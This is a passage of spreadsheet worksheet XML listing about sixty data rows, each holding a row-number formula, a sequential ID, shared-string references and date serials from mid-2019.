      </c>
      <c r="B12002">
        <v>2001</v>
      </c>
      <c r="C12002" t="s">
        <v>19637</v>
      </c>
      <c r="D12002" s="1">
        <v>43676</v>
      </c>
      <c r="E12002" t="s">
        <v>19896</v>
      </c>
      <c r="F12002" t="s">
        <v>10021</v>
      </c>
      <c r="G12002" t="s">
        <v>22123</v>
      </c>
    </row>
    <row r="12003" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12003">
        <f t="shared" si="187"/>
        <v>12002</v>
      </c>
      <c r="B12003">
        <v>2002</v>
      </c>
      <c r="C12003" t="s">
        <v>19637</v>
      </c>
      <c r="D12003" s="1">
        <v>43669</v>
      </c>
      <c r="E12003" t="s">
        <v>20187</v>
      </c>
      <c r="F12003" t="s">
        <v>9975</v>
      </c>
      <c r="G12003" t="s">
        <v>22124</v>
      </c>
    </row>
    <row r="12004" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12004">
        <f t="shared" si="187"/>
        <v>12003</v>
      </c>
      <c r="B12004">
        <v>2003</v>
      </c>
      <c r="C12004" t="s">
        <v>19637</v>
      </c>
      <c r="D12004" s="1">
        <v>43674</v>
      </c>
      <c r="E12004" t="s">
        <v>22125</v>
      </c>
      <c r="F12004" t="s">
        <v>10526</v>
      </c>
      <c r="G12004" t="s">
        <v>22126</v>
      </c>
    </row>
    <row r="12005" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12005">
        <f t="shared" si="187"/>
        <v>12004</v>
      </c>
      <c r="B12005">
        <v>2004</v>
      </c>
      <c r="C12005" t="s">
        <v>19637</v>
      </c>
      <c r="D12005" s="1">
        <v>43668</v>
      </c>
      <c r="E12005" t="s">
        <v>20034</v>
      </c>
      <c r="F12005" t="s">
        <v>10021</v>
      </c>
      <c r="G12005" t="s">
        <v>22127</v>
      </c>
    </row>
    <row r="12006" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12006">
        <f t="shared" si="187"/>
        <v>12005</v>
      </c>
      <c r="B12006">
        <v>2005</v>
      </c>
      <c r="C12006" t="s">
        <v>19637</v>
      </c>
      <c r="D12006" s="1">
        <v>43668</v>
      </c>
      <c r="E12006" t="s">
        <v>22128</v>
      </c>
      <c r="F12006" t="s">
        <v>10021</v>
      </c>
      <c r="G12006" t="s">
        <v>22129</v>
      </c>
    </row>
    <row r="12007" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12007">
        <f t="shared" si="187"/>
        <v>12006</v>
      </c>
      <c r="B12007">
        <v>2006</v>
      </c>
      <c r="C12007" t="s">
        <v>19637</v>
      </c>
      <c r="D12007" s="1">
        <v>43675</v>
      </c>
      <c r="F12007" t="s">
        <v>9978</v>
      </c>
      <c r="G12007" t="s">
        <v>22130</v>
      </c>
    </row>
    <row r="12008" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12008">
        <f t="shared" si="187"/>
        <v>12007</v>
      </c>
      <c r="B12008">
        <v>2007</v>
      </c>
      <c r="C12008" t="s">
        <v>19637</v>
      </c>
      <c r="D12008" s="1">
        <v>43669</v>
      </c>
      <c r="E12008" t="s">
        <v>22131</v>
      </c>
      <c r="F12008" t="s">
        <v>9978</v>
      </c>
      <c r="G12008" t="s">
        <v>22132</v>
      </c>
    </row>
    <row r="12009" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12009">
        <f t="shared" si="187"/>
        <v>12008</v>
      </c>
      <c r="B12009">
        <v>2008</v>
      </c>
      <c r="C12009" t="s">
        <v>19637</v>
      </c>
      <c r="D12009" s="1">
        <v>43674</v>
      </c>
      <c r="F12009" t="s">
        <v>10021</v>
      </c>
      <c r="G12009" t="s">
        <v>22133</v>
      </c>
    </row>
    <row r="12010" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12010">
        <f t="shared" si="187"/>
        <v>12009</v>
      </c>
      <c r="B12010">
        <v>2009</v>
      </c>
      <c r="C12010" t="s">
        <v>19637</v>
      </c>
      <c r="D12010" s="1">
        <v>43672</v>
      </c>
      <c r="F12010" t="s">
        <v>10526</v>
      </c>
      <c r="G12010" t="s">
        <v>22134</v>
      </c>
    </row>
    <row r="12011" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12011">
        <f t="shared" si="187"/>
        <v>12010</v>
      </c>
      <c r="B12011">
        <v>2010</v>
      </c>
      <c r="C12011" t="s">
        <v>19637</v>
      </c>
      <c r="D12011" s="1">
        <v>43668</v>
      </c>
      <c r="E12011" t="s">
        <v>19650</v>
      </c>
      <c r="F12011" t="s">
        <v>10021</v>
      </c>
      <c r="G12011" t="s">
        <v>22135</v>
      </c>
    </row>
    <row r="12012" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12012">
        <f t="shared" si="187"/>
        <v>12011</v>
      </c>
      <c r="B12012">
        <v>2011</v>
      </c>
      <c r="C12012" t="s">
        <v>19637</v>
      </c>
      <c r="D12012" s="1">
        <v>43672</v>
      </c>
      <c r="E12012" t="s">
        <v>19643</v>
      </c>
      <c r="F12012" t="s">
        <v>10021</v>
      </c>
      <c r="G12012" t="s">
        <v>22136</v>
      </c>
    </row>
    <row r="12013" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12013">
        <f t="shared" si="187"/>
        <v>12012</v>
      </c>
      <c r="B12013">
        <v>2012</v>
      </c>
      <c r="C12013" t="s">
        <v>19637</v>
      </c>
      <c r="D12013" s="1">
        <v>43671</v>
      </c>
      <c r="E12013" t="s">
        <v>22137</v>
      </c>
      <c r="F12013" t="s">
        <v>10526</v>
      </c>
      <c r="G12013" t="s">
        <v>22138</v>
      </c>
    </row>
    <row r="12014" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12014">
        <f t="shared" si="187"/>
        <v>12013</v>
      </c>
      <c r="B12014">
        <v>2013</v>
      </c>
      <c r="C12014" t="s">
        <v>19637</v>
      </c>
      <c r="D12014" s="1">
        <v>43673</v>
      </c>
      <c r="E12014" t="s">
        <v>19741</v>
      </c>
      <c r="F12014" t="s">
        <v>9975</v>
      </c>
      <c r="G12014" t="s">
        <v>22139</v>
      </c>
    </row>
    <row r="12015" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12015">
        <f t="shared" si="187"/>
        <v>12014</v>
      </c>
      <c r="B12015">
        <v>2014</v>
      </c>
      <c r="C12015" t="s">
        <v>19637</v>
      </c>
      <c r="D12015" s="1">
        <v>43676</v>
      </c>
      <c r="E12015" t="s">
        <v>19741</v>
      </c>
      <c r="F12015" t="s">
        <v>9975</v>
      </c>
      <c r="G12015" t="s">
        <v>22140</v>
      </c>
    </row>
    <row r="12016" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12016">
        <f t="shared" si="187"/>
        <v>12015</v>
      </c>
      <c r="B12016">
        <v>2015</v>
      </c>
      <c r="C12016" t="s">
        <v>19637</v>
      </c>
      <c r="D12016" s="1">
        <v>43671</v>
      </c>
      <c r="E12016" t="s">
        <v>22141</v>
      </c>
      <c r="F12016" t="s">
        <v>10526</v>
      </c>
      <c r="G12016" t="s">
        <v>22142</v>
      </c>
    </row>
    <row r="12017" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12017">
        <f t="shared" si="187"/>
        <v>12016</v>
      </c>
      <c r="B12017">
        <v>2016</v>
      </c>
      <c r="C12017" t="s">
        <v>19637</v>
      </c>
      <c r="D12017" s="1">
        <v>43673</v>
      </c>
      <c r="E12017" t="s">
        <v>20253</v>
      </c>
      <c r="F12017" t="s">
        <v>9978</v>
      </c>
      <c r="G12017" t="s">
        <v>22143</v>
      </c>
    </row>
    <row r="12018" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12018">
        <f t="shared" si="187"/>
        <v>12017</v>
      </c>
      <c r="B12018">
        <v>2017</v>
      </c>
      <c r="C12018" t="s">
        <v>19637</v>
      </c>
      <c r="D12018" s="1">
        <v>43669</v>
      </c>
      <c r="E12018" t="s">
        <v>20829</v>
      </c>
      <c r="F12018" t="s">
        <v>10021</v>
      </c>
      <c r="G12018" t="s">
        <v>22144</v>
      </c>
    </row>
    <row r="12019" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12019">
        <f t="shared" si="187"/>
        <v>12018</v>
      </c>
      <c r="B12019">
        <v>2018</v>
      </c>
      <c r="C12019" t="s">
        <v>19637</v>
      </c>
      <c r="D12019" s="1">
        <v>43669</v>
      </c>
      <c r="E12019" t="s">
        <v>19849</v>
      </c>
      <c r="F12019" t="s">
        <v>10021</v>
      </c>
      <c r="G12019" t="s">
        <v>22145</v>
      </c>
    </row>
    <row r="12020" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12020">
        <f t="shared" si="187"/>
        <v>12019</v>
      </c>
      <c r="B12020">
        <v>2019</v>
      </c>
      <c r="C12020" t="s">
        <v>19637</v>
      </c>
      <c r="D12020" s="1">
        <v>43677</v>
      </c>
      <c r="F12020" t="s">
        <v>10526</v>
      </c>
      <c r="G12020" t="s">
        <v>22146</v>
      </c>
    </row>
    <row r="12021" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12021">
        <f t="shared" si="187"/>
        <v>12020</v>
      </c>
      <c r="B12021">
        <v>2020</v>
      </c>
      <c r="C12021" t="s">
        <v>19637</v>
      </c>
      <c r="D12021" s="1">
        <v>43677</v>
      </c>
      <c r="E12021" t="s">
        <v>19638</v>
      </c>
      <c r="F12021" t="s">
        <v>10021</v>
      </c>
      <c r="G12021" t="s">
        <v>22147</v>
      </c>
    </row>
    <row r="12022" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12022">
        <f t="shared" si="187"/>
        <v>12021</v>
      </c>
      <c r="B12022">
        <v>2021</v>
      </c>
      <c r="C12022" t="s">
        <v>19637</v>
      </c>
      <c r="D12022" s="1">
        <v>43670</v>
      </c>
      <c r="E12022" t="s">
        <v>22148</v>
      </c>
      <c r="F12022" t="s">
        <v>10526</v>
      </c>
      <c r="G12022" t="s">
        <v>22149</v>
      </c>
    </row>
    <row r="12023" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12023">
        <f t="shared" si="187"/>
        <v>12022</v>
      </c>
      <c r="B12023">
        <v>2022</v>
      </c>
      <c r="C12023" t="s">
        <v>19637</v>
      </c>
      <c r="D12023" s="1">
        <v>43674</v>
      </c>
      <c r="E12023" t="s">
        <v>20779</v>
      </c>
      <c r="F12023" t="s">
        <v>10021</v>
      </c>
      <c r="G12023" t="s">
        <v>22150</v>
      </c>
    </row>
    <row r="12024" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12024">
        <f t="shared" si="187"/>
        <v>12023</v>
      </c>
      <c r="B12024">
        <v>2023</v>
      </c>
      <c r="C12024" t="s">
        <v>19637</v>
      </c>
      <c r="D12024" s="1">
        <v>43672</v>
      </c>
      <c r="E12024" t="s">
        <v>19640</v>
      </c>
      <c r="F12024" t="s">
        <v>9975</v>
      </c>
      <c r="G12024" t="s">
        <v>22151</v>
      </c>
    </row>
    <row r="12025" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12025">
        <f t="shared" si="187"/>
        <v>12024</v>
      </c>
      <c r="B12025">
        <v>2024</v>
      </c>
      <c r="C12025" t="s">
        <v>19637</v>
      </c>
      <c r="D12025" s="1">
        <v>43676</v>
      </c>
      <c r="E12025" t="s">
        <v>19640</v>
      </c>
      <c r="F12025" t="s">
        <v>10021</v>
      </c>
      <c r="G12025" t="s">
        <v>22152</v>
      </c>
    </row>
    <row r="12026" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12026">
        <f t="shared" si="187"/>
        <v>12025</v>
      </c>
      <c r="B12026">
        <v>2025</v>
      </c>
      <c r="C12026" t="s">
        <v>19637</v>
      </c>
      <c r="D12026" s="1">
        <v>43675</v>
      </c>
      <c r="E12026" t="s">
        <v>19840</v>
      </c>
      <c r="F12026" t="s">
        <v>10021</v>
      </c>
      <c r="G12026" t="s">
        <v>22153</v>
      </c>
    </row>
    <row r="12027" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12027">
        <f t="shared" si="187"/>
        <v>12026</v>
      </c>
      <c r="B12027">
        <v>2026</v>
      </c>
      <c r="C12027" t="s">
        <v>19637</v>
      </c>
      <c r="D12027" s="1">
        <v>43671</v>
      </c>
      <c r="E12027" t="s">
        <v>20995</v>
      </c>
      <c r="F12027" t="s">
        <v>9975</v>
      </c>
      <c r="G12027" t="s">
        <v>22154</v>
      </c>
    </row>
    <row r="12028" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12028">
        <f t="shared" si="187"/>
        <v>12027</v>
      </c>
      <c r="B12028">
        <v>2027</v>
      </c>
      <c r="C12028" t="s">
        <v>19637</v>
      </c>
      <c r="D12028" s="1">
        <v>43675</v>
      </c>
      <c r="F12028" t="s">
        <v>10526</v>
      </c>
      <c r="G12028" t="s">
        <v>22155</v>
      </c>
    </row>
    <row r="12029" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12029">
        <f t="shared" si="187"/>
        <v>12028</v>
      </c>
      <c r="B12029">
        <v>2028</v>
      </c>
      <c r="C12029" t="s">
        <v>19637</v>
      </c>
      <c r="D12029" s="1">
        <v>43673</v>
      </c>
      <c r="E12029" t="s">
        <v>19690</v>
      </c>
      <c r="F12029" t="s">
        <v>9978</v>
      </c>
      <c r="G12029" t="s">
        <v>22156</v>
      </c>
    </row>
    <row r="12030" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12030">
        <f t="shared" si="187"/>
        <v>12029</v>
      </c>
      <c r="B12030">
        <v>2029</v>
      </c>
      <c r="C12030" t="s">
        <v>19637</v>
      </c>
      <c r="D12030" s="1">
        <v>43676</v>
      </c>
      <c r="E12030" t="s">
        <v>19640</v>
      </c>
      <c r="F12030" t="s">
        <v>10021</v>
      </c>
      <c r="G12030" t="s">
        <v>22157</v>
      </c>
    </row>
    <row r="12031" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12031">
        <f t="shared" si="187"/>
        <v>12030</v>
      </c>
      <c r="B12031">
        <v>2030</v>
      </c>
      <c r="C12031" t="s">
        <v>19637</v>
      </c>
      <c r="D12031" s="1">
        <v>43670</v>
      </c>
      <c r="E12031" t="s">
        <v>20291</v>
      </c>
      <c r="F12031" t="s">
        <v>10526</v>
      </c>
      <c r="G12031" t="s">
        <v>22158</v>
      </c>
    </row>
    <row r="12032" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12032">
        <f t="shared" si="187"/>
        <v>12031</v>
      </c>
      <c r="B12032">
        <v>2031</v>
      </c>
      <c r="C12032" t="s">
        <v>19637</v>
      </c>
      <c r="D12032" s="1">
        <v>43673</v>
      </c>
      <c r="E12032" t="s">
        <v>19640</v>
      </c>
      <c r="F12032" t="s">
        <v>10021</v>
      </c>
      <c r="G12032" t="s">
        <v>22159</v>
      </c>
    </row>
    <row r="12033" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12033">
        <f t="shared" si="187"/>
        <v>12032</v>
      </c>
      <c r="B12033">
        <v>2032</v>
      </c>
      <c r="C12033" t="s">
        <v>19637</v>
      </c>
      <c r="D12033" s="1">
        <v>43670</v>
      </c>
      <c r="E12033" t="s">
        <v>19690</v>
      </c>
      <c r="F12033" t="s">
        <v>9978</v>
      </c>
      <c r="G12033" t="s">
        <v>22160</v>
      </c>
    </row>
    <row r="12034" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12034">
        <f t="shared" si="187"/>
        <v>12033</v>
      </c>
      <c r="B12034">
        <v>2033</v>
      </c>
      <c r="C12034" t="s">
        <v>19637</v>
      </c>
      <c r="D12034" s="1">
        <v>43677</v>
      </c>
      <c r="E12034" t="s">
        <v>22161</v>
      </c>
      <c r="F12034" t="s">
        <v>10021</v>
      </c>
      <c r="G12034" t="s">
        <v>22162</v>
      </c>
    </row>
    <row r="12035" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12035">
        <f t="shared" ref="A12035:A12098" si="188">+ROW(A12034)</f>
        <v>12034</v>
      </c>
      <c r="B12035">
        <v>2034</v>
      </c>
      <c r="C12035" t="s">
        <v>19637</v>
      </c>
      <c r="D12035" s="1">
        <v>43676</v>
      </c>
      <c r="E12035" t="s">
        <v>21678</v>
      </c>
      <c r="F12035" t="s">
        <v>9975</v>
      </c>
      <c r="G12035" t="s">
        <v>22163</v>
      </c>
    </row>
    <row r="12036" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12036">
        <f t="shared" si="188"/>
        <v>12035</v>
      </c>
      <c r="B12036">
        <v>2035</v>
      </c>
      <c r="C12036" t="s">
        <v>19637</v>
      </c>
      <c r="D12036" s="1">
        <v>43671</v>
      </c>
      <c r="E12036" t="s">
        <v>19645</v>
      </c>
      <c r="F12036" t="s">
        <v>9975</v>
      </c>
      <c r="G12036" t="s">
        <v>22164</v>
      </c>
    </row>
    <row r="12037" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12037">
        <f t="shared" si="188"/>
        <v>12036</v>
      </c>
      <c r="B12037">
        <v>2036</v>
      </c>
      <c r="C12037" t="s">
        <v>19637</v>
      </c>
      <c r="D12037" s="1">
        <v>43671</v>
      </c>
      <c r="E12037" t="s">
        <v>20985</v>
      </c>
      <c r="F12037" t="s">
        <v>10526</v>
      </c>
      <c r="G12037" t="s">
        <v>22165</v>
      </c>
    </row>
    <row r="12038" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12038">
        <f t="shared" si="188"/>
        <v>12037</v>
      </c>
      <c r="B12038">
        <v>2037</v>
      </c>
      <c r="C12038" t="s">
        <v>19637</v>
      </c>
      <c r="D12038" s="1">
        <v>43674</v>
      </c>
      <c r="E12038" t="s">
        <v>22166</v>
      </c>
      <c r="F12038" t="s">
        <v>10526</v>
      </c>
      <c r="G12038" t="s">
        <v>22167</v>
      </c>
    </row>
    <row r="12039" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12039">
        <f t="shared" si="188"/>
        <v>12038</v>
      </c>
      <c r="B12039">
        <v>2038</v>
      </c>
      <c r="C12039" t="s">
        <v>19637</v>
      </c>
      <c r="D12039" s="1">
        <v>43668</v>
      </c>
      <c r="F12039" t="s">
        <v>10526</v>
      </c>
      <c r="G12039" t="s">
        <v>22168</v>
      </c>
    </row>
    <row r="12040" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12040">
        <f t="shared" si="188"/>
        <v>12039</v>
      </c>
      <c r="B12040">
        <v>2039</v>
      </c>
      <c r="C12040" t="s">
        <v>19637</v>
      </c>
      <c r="D12040" s="1">
        <v>43672</v>
      </c>
      <c r="E12040" t="s">
        <v>22169</v>
      </c>
      <c r="F12040" t="s">
        <v>10526</v>
      </c>
      <c r="G12040" t="s">
        <v>22170</v>
      </c>
    </row>
    <row r="12041" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12041">
        <f t="shared" si="188"/>
        <v>12040</v>
      </c>
      <c r="B12041">
        <v>2040</v>
      </c>
      <c r="C12041" t="s">
        <v>19637</v>
      </c>
      <c r="D12041" s="1">
        <v>43674</v>
      </c>
      <c r="E12041" t="s">
        <v>19840</v>
      </c>
      <c r="F12041" t="s">
        <v>10021</v>
      </c>
      <c r="G12041" t="s">
        <v>22171</v>
      </c>
    </row>
    <row r="12042" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12042">
        <f t="shared" si="188"/>
        <v>12041</v>
      </c>
      <c r="B12042">
        <v>2041</v>
      </c>
      <c r="C12042" t="s">
        <v>19637</v>
      </c>
      <c r="D12042" s="1">
        <v>43674</v>
      </c>
      <c r="E12042" t="s">
        <v>22172</v>
      </c>
      <c r="F12042" t="s">
        <v>10526</v>
      </c>
      <c r="G12042" t="s">
        <v>22173</v>
      </c>
    </row>
    <row r="12043" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12043">
        <f t="shared" si="188"/>
        <v>12042</v>
      </c>
      <c r="B12043">
        <v>2042</v>
      </c>
      <c r="C12043" t="s">
        <v>19637</v>
      </c>
      <c r="D12043" s="1">
        <v>43673</v>
      </c>
      <c r="E12043" t="s">
        <v>20288</v>
      </c>
      <c r="F12043" t="s">
        <v>10021</v>
      </c>
      <c r="G12043" t="s">
        <v>22174</v>
      </c>
    </row>
    <row r="12044" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12044">
        <f t="shared" si="188"/>
        <v>12043</v>
      </c>
      <c r="B12044">
        <v>2043</v>
      </c>
      <c r="C12044" t="s">
        <v>19637</v>
      </c>
      <c r="D12044" s="1">
        <v>43674</v>
      </c>
      <c r="E12044" t="s">
        <v>20929</v>
      </c>
      <c r="F12044" t="s">
        <v>10526</v>
      </c>
      <c r="G12044" t="s">
        <v>22175</v>
      </c>
    </row>
    <row r="12045" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12045">
        <f t="shared" si="188"/>
        <v>12044</v>
      </c>
      <c r="B12045">
        <v>2044</v>
      </c>
      <c r="C12045" t="s">
        <v>19637</v>
      </c>
      <c r="D12045" s="1">
        <v>43669</v>
      </c>
      <c r="F12045" t="s">
        <v>9978</v>
      </c>
      <c r="G12045" t="s">
        <v>22176</v>
      </c>
    </row>
    <row r="12046" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12046">
        <f t="shared" si="188"/>
        <v>12045</v>
      </c>
      <c r="B12046">
        <v>2045</v>
      </c>
      <c r="C12046" t="s">
        <v>19637</v>
      </c>
      <c r="D12046" s="1">
        <v>43672</v>
      </c>
      <c r="E12046" t="s">
        <v>20253</v>
      </c>
      <c r="F12046" t="s">
        <v>9978</v>
      </c>
      <c r="G12046" t="s">
        <v>22177</v>
      </c>
    </row>
    <row r="12047" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12047">
        <f t="shared" si="188"/>
        <v>12046</v>
      </c>
      <c r="B12047">
        <v>2046</v>
      </c>
      <c r="C12047" t="s">
        <v>19637</v>
      </c>
      <c r="D12047" s="1">
        <v>43670</v>
      </c>
      <c r="E12047" t="s">
        <v>19640</v>
      </c>
      <c r="F12047" t="s">
        <v>9975</v>
      </c>
      <c r="G12047" t="s">
        <v>22178</v>
      </c>
    </row>
    <row r="12048" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12048">
        <f t="shared" si="188"/>
        <v>12047</v>
      </c>
      <c r="B12048">
        <v>2047</v>
      </c>
      <c r="C12048" t="s">
        <v>19637</v>
      </c>
      <c r="D12048" s="1">
        <v>43674</v>
      </c>
      <c r="E12048" t="s">
        <v>20512</v>
      </c>
      <c r="F12048" t="s">
        <v>10526</v>
      </c>
      <c r="G12048" t="s">
        <v>22179</v>
      </c>
    </row>
    <row r="12049" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12049">
        <f t="shared" si="188"/>
        <v>12048</v>
      </c>
      <c r="B12049">
        <v>2048</v>
      </c>
      <c r="C12049" t="s">
        <v>19637</v>
      </c>
      <c r="D12049" s="1">
        <v>43670</v>
      </c>
      <c r="E12049" t="s">
        <v>19750</v>
      </c>
      <c r="F12049" t="s">
        <v>9978</v>
      </c>
      <c r="G12049" t="s">
        <v>22180</v>
      </c>
    </row>
    <row r="12050" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12050">
        <f t="shared" si="188"/>
        <v>12049</v>
      </c>
      <c r="B12050">
        <v>2049</v>
      </c>
      <c r="C12050" t="s">
        <v>19637</v>
      </c>
      <c r="D12050" s="1">
        <v>43677</v>
      </c>
      <c r="E12050" t="s">
        <v>19640</v>
      </c>
      <c r="F12050" t="s">
        <v>10021</v>
      </c>
      <c r="G12050" t="s">
        <v>22181</v>
      </c>
    </row>
    <row r="12051" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12051">
        <f t="shared" si="188"/>
        <v>12050</v>
      </c>
      <c r="B12051">
        <v>2050</v>
      </c>
      <c r="C12051" t="s">
        <v>19637</v>
      </c>
      <c r="D12051" s="1">
        <v>43675</v>
      </c>
      <c r="E12051" t="s">
        <v>20187</v>
      </c>
      <c r="F12051" t="s">
        <v>9975</v>
      </c>
      <c r="G12051" t="s">
        <v>22182</v>
      </c>
    </row>
    <row r="12052" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12052">
        <f t="shared" si="188"/>
        <v>12051</v>
      </c>
      <c r="B12052">
        <v>2051</v>
      </c>
      <c r="C12052" t="s">
        <v>19637</v>
      </c>
      <c r="D12052" s="1">
        <v>43669</v>
      </c>
      <c r="F12052" t="s">
        <v>10526</v>
      </c>
      <c r="G12052" t="s">
        <v>22183</v>
      </c>
    </row>
    <row r="12053" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12053">
        <f t="shared" si="188"/>
        <v>12052</v>
      </c>
      <c r="B12053">
        <v>2052</v>
      </c>
      <c r="C12053" t="s">
        <v>19637</v>
      </c>
      <c r="D12053" s="1">
        <v>43673</v>
      </c>
      <c r="E12053" t="s">
        <v>19796</v>
      </c>
      <c r="F12053" t="s">
        <v>10021</v>
      </c>
      <c r="G12053" t="s">
        <v>22184</v>
      </c>
    </row>
    <row r="12054" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12054">
        <f t="shared" si="188"/>
        <v>12053</v>
      </c>
      <c r="B12054">
        <v>2053</v>
      </c>
      <c r="C12054" t="s">
        <v>19637</v>
      </c>
      <c r="D12054" s="1">
        <v>43677</v>
      </c>
      <c r="E12054" t="s">
        <v>19741</v>
      </c>
      <c r="F12054" t="s">
        <v>9975</v>
      </c>
      <c r="G12054" t="s">
        <v>22185</v>
      </c>
    </row>
    <row r="12055" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12055">
        <f t="shared" si="188"/>
        <v>12054</v>
      </c>
      <c r="B12055">
        <v>2054</v>
      </c>
      <c r="C12055" t="s">
        <v>19637</v>
      </c>
      <c r="D12055" s="1">
        <v>43675</v>
      </c>
      <c r="E12055" t="s">
        <v>19966</v>
      </c>
      <c r="F12055" t="s">
        <v>9978</v>
      </c>
      <c r="G12055" t="s">
        <v>22186</v>
      </c>
    </row>
    <row r="12056" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12056">
        <f t="shared" si="188"/>
        <v>12055</v>
      </c>
      <c r="B12056">
        <v>2055</v>
      </c>
      <c r="C12056" t="s">
        <v>19637</v>
      </c>
      <c r="D12056" s="1">
        <v>43676</v>
      </c>
      <c r="E12056" t="s">
        <v>19638</v>
      </c>
      <c r="F12056" t="s">
        <v>10021</v>
      </c>
      <c r="G12056" t="s">
        <v>22187</v>
      </c>
    </row>
    <row r="12057" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12057">
        <f t="shared" si="188"/>
        <v>12056</v>
      </c>
      <c r="B12057">
        <v>2056</v>
      </c>
      <c r="C12057" t="s">
        <v>19637</v>
      </c>
      <c r="D12057" s="1">
        <v>43677</v>
      </c>
      <c r="E12057" t="s">
        <v>22188</v>
      </c>
      <c r="F12057" t="s">
        <v>10526</v>
      </c>
      <c r="G12057" t="s">
        <v>22189</v>
      </c>
    </row>
    <row r="12058" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12058">
        <f t="shared" si="188"/>
        <v>12057</v>
      </c>
      <c r="B12058">
        <v>2057</v>
      </c>
      <c r="C12058" t="s">
        <v>19637</v>
      </c>
      <c r="D12058" s="1">
        <v>43676</v>
      </c>
      <c r="E12058" t="s">
        <v>20421</v>
      </c>
      <c r="F12058" t="s">
        <v>10021</v>
      </c>
      <c r="G12058" t="s">
        <v>22190</v>
      </c>
    </row>
    <row r="12059" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12059">
        <f t="shared" si="188"/>
        <v>12058</v>
      </c>
      <c r="B12059">
        <v>2058</v>
      </c>
      <c r="C12059" t="s">
        <v>19637</v>
      </c>
      <c r="D12059" s="1">
        <v>43674</v>
      </c>
      <c r="E12059" t="s">
        <v>20005</v>
      </c>
      <c r="F12059" t="s">
        <v>9975</v>
      </c>
      <c r="G12059" t="s">
        <v>22191</v>
      </c>
    </row>
    <row r="12060" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12060">
        <f t="shared" si="188"/>
        <v>12059</v>
      </c>
      <c r="B12060">
        <v>2059</v>
      </c>
      <c r="C12060" t="s">
        <v>19637</v>
      </c>
      <c r="D12060" s="1">
        <v>43676</v>
      </c>
      <c r="F12060" t="s">
        <v>9975</v>
      </c>
      <c r="G12060" t="s">
        <v>22192</v>
      </c>
    </row>
    <row r="12061" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12061">
        <f t="shared" si="188"/>
        <v>12060</v>
      </c>
      <c r="B12061">
        <v>2060</v>
      </c>
      <c r="C12061" t="s">
        <v>19637</v>
      </c>
      <c r="D12061" s="1">
        <v>43671</v>
      </c>
      <c r="E12061" t="s">
        <v>20385</v>
      </c>
      <c r="F12061" t="s">
        <v>9978</v>
      </c>
      <c r="G12061" t="s">
        <v>22193</v>
      </c>
    </row>
    <row r="12062" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12062">
        <f t="shared" si="188"/>
        <v>12061</v>
      </c>
      <c r="B12062">
        <v>2061</v>
      </c>
      <c r="C12062" t="s">
        <v>19637</v>
      </c>
      <c r="D12062" s="1">
        <v>43669</v>
      </c>
      <c r="E12062" t="s">
        <v>19640</v>
      </c>
      <c r="F12062" t="s">
        <v>9975</v>
      </c>
      <c r="G12062" t="s">
        <v>22194</v>
      </c>
    </row>
    <row r="12063" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12063">
        <f t="shared" si="188"/>
        <v>12062</v>
      </c>
      <c r="B12063">
        <v>2062</v>
      </c>
      <c r="C12063" t="s">
        <v>19637</v>
      </c>
      <c r="D12063" s="1">
        <v>43670</v>
      </c>
      <c r="E12063" t="s">
        <v>19725</v>
      </c>
      <c r="F12063" t="s">
        <v>9978</v>
      </c>
      <c r="G12063" t="s">
        <v>22195</v>
      </c>
    </row>
    <row r="12064" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12064">
